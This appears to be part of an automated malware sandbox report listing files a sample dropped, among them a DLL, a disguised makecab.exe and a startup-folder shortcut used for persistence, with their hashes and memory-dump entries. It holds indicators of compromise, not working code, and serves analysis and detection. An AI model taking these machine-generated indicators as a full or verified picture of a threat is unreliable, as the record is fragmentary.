                    • C:\Users\Admin\AppData\Roaming\HelpButton.dll
                      MD5

                      d41d8cd98f00b204e9800998ecf8427e

                      SHA1

                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                      SHA256

                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                      SHA512

                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\makecab.lnk
                      Filesize

                      1KB

                      MD5

                      843621f7c7da519c3b18af33dc600df7

                      SHA1

                      02a07888d1d99d71899f8d82fe15c89813de8301

                      SHA256

                      56cc19b8da5ec13ea65823eccf12703dac0e7940c1ea07666e0d2bab7e52d82f

                      SHA512

                      eecea6b6d653c4cc10c8a30a97720adf75d58ba36de615d1ed09fabefeeff933f7dc2b8810862f74ed947b5f3a6e38508d360b5f91baf7bb8ee538ffc846ecf7

                    • C:\Users\Admin\AppData\Roaming\Phenothiazine.aLp
                      Filesize

                      4KB

                      MD5

                      4cd6691685530a80f97c5633b75a8d81

                      SHA1

                      a2d8a60847c6a4c0df2e87ac5964b98806d3a2e7

                      SHA256

                      1e8ea471a61594fbf877acc9c2cc26cccf2eb6bd1da7c7dd803a1b154d632c6c

                      SHA512

                      d05c9d9c870c885cd7a964e669f775e5e4c9da99cd97cc1509f7e08af61fb13d97688f337fe5b9ac6c9c3c6cd14c95df4689b2715fdc531eac3d58133fbe2c48

                    • C:\Users\Admin\AppData\Roaming\eclipse.plugin.provider.xml
                      Filesize

                      1KB

                      MD5

                      eb0e17f9bf03d0694057850821b56792

                      SHA1

                      8f5ed3a32e8f45fe2f61bf5035c315498f95a16c

                      SHA256

                      802ed3ac17c023e6f3bfeb98ea8a0db2bd75e8f3b08a182937ce22007cc75f8f

                      SHA512

                      e3fdc8e13019f9eae4e619772ae8ce33be12c6165381a28bee2c53f0fd1f4478e8517d7fe96ca365271141f41342ed0739efd67b8bff03da72ce457fba0840ff

                    • C:\Users\Admin\AppData\Roaming\eclipse.plugin.provider.xml
                      Filesize

                      914B

                      MD5

                      72d925da1cf45aed93d045853a5281a8

                      SHA1

                      354dc025c187395a741ff630aaf6ca9ddf2d0d47

                      SHA256

                      19c79b8b4731e5a4f1bff40db16c6bae24fc7d299243a45ccd8998290247413d

                      SHA512

                      685081bd6829d3f825f2b50febd0df1c0db602bc9ea68c425b9bcc07b59e3860b91fbe918f485ac650cfbc14ea08f00dd98ad287d013190af829813122572c68

                    • \Users\Admin\AppData\Local\Temp\nsjD902.tmp\System.dll
                      Filesize

                      11KB

                      MD5

                      6f5257c0b8c0ef4d440f4f4fce85fb1b

                      SHA1

                      b6ac111dfb0d1fc75ad09c56bde7830232395785

                      SHA256

                      b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1

                      SHA512

                      a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8

                    • \Users\Admin\AppData\Roaming\HelpButton.dll
                      Filesize

                      68KB

                      MD5

                      27a5e7b6a25949beeae9d66ee66759b4

                      SHA1

                      c98d27eb5421cc0e12f1736d8cb6da952df25635

                      SHA256

                      ca1469a748c0805bedaa6bbcf87cfea1772a004ce5fb1ef1e5f62998874d4851

                      SHA512

                      426dd583044d651b790e006189d2ff42dcb883851dffa61cef2b4badaa43fde5a718e8ec4415ac928a39b81a6507ab54d2a1d0842bfbec4db89656478b610bea

                    • \Users\Admin\AppData\Roaming\{13610826-3503-134D-4C2C-C16FE04D06AA}\makecab.exe
                      Filesize

                      257KB

                      MD5

                      31318ee80570c7168708575f032ac63f

                      SHA1

                      82a8589abd62b469c4ec3c454434a75a63f8b2c6

                      SHA256

                      849b68c42ca9935f63aea47b02a730b64d0dcb9897e589fee3f64175bc592d84

                      SHA512

                      bd0e851945ad1b2fd726976e5f03f4fad934f598cb8d936c59922afeb8e2cb575dc1a20a008bede70db26f4d6a91eb73d822539c59da7f5975e4244bc65440bc

                    • memory/1200-96-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/1200-84-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/1200-97-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/1200-88-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/1200-87-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/1200-85-0x0000000002C50000-0x0000000002C51000-memory.dmp
                      Filesize

                      4KB

                    • memory/1200-80-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/1200-81-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2056-11-0x0000000001E40000-0x0000000001E52000-memory.dmp
                      Filesize

                      72KB

                    • memory/2348-63-0x0000000002B20000-0x0000000002B32000-memory.dmp
                      Filesize

                      72KB

                    • memory/2656-43-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-29-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-14-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-20-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-33-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-16-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-22-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-24-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
                      Filesize

                      4KB

                    • memory/2656-26-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-15-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-18-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-30-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB

                    • memory/2656-28-0x0000000000400000-0x000000000043A000-memory.dmp
                      Filesize

                      232KB